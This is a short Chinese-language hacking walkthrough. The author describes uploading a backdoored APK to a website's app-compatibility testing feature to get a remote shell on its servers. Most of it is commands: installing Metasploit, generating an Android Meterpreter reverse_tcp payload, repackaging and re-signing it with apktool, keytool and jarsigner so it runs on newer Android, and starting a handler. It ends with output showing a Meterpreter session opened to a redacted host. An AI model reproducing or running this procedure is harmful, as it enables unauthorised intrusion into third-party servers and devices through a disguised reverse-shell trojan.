工具

今儿遇见个站,有个功能是上传apk做兼容性测试,那一看能上传文件执行就想到传马上线

安装msf:

1
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall &&   chmod 755 msfinstall &&   ./msfinstall

生成马:

1
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=5555 > sdf.apk

msf生成的马新版本安卓打不开,需要逆向后重新编译

下载apktool

https://ibotpeaches.github.io/Apktool/

和刚才的马放到同一个目录下,路径不要有中文,打包的时候会出错

解包

1
java -jar .\apktool_2.10.0.jar d -f .\sdf.apk -o ama

进到ama目录下,把apktool.yml里的sdkInfo改成如下

1
2
3
sdkInfo:
  minSdkVersion: 16
  targetSdkVersion: 23

重新打包:

1
java -jar .\apktool_2.10.0.jar b .\ama\ -o new.apk

生成签名证书:

1
keytool -genkeypair -alias sss -keyalg RSA -validity 100 -keystore sss.jks

签名:

1
jarsigner -verbose -keystore sss.jks -signedjar hhh.apk new.apk sss

开msfconsole:

1
2
3
4
5
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 5555
run

运行上线:

1
2
3
4
5
6
msf6 exploit(multi/handler) > run

[-] Handler failed to bind to xxx.xxx.xxx.xxx:50001:-  -
[*] Started reverse TCP handler on 0.0.0.0:50001
[*] Sending stage (72424 bytes) to xxx.xxx.xxx.xxx
[*] Meterpreter session 1 opened (172.28.198.158:50001 -> xxx.xxx.xxx.xxx:28082) at 2024-12-13 17:36:35 +0800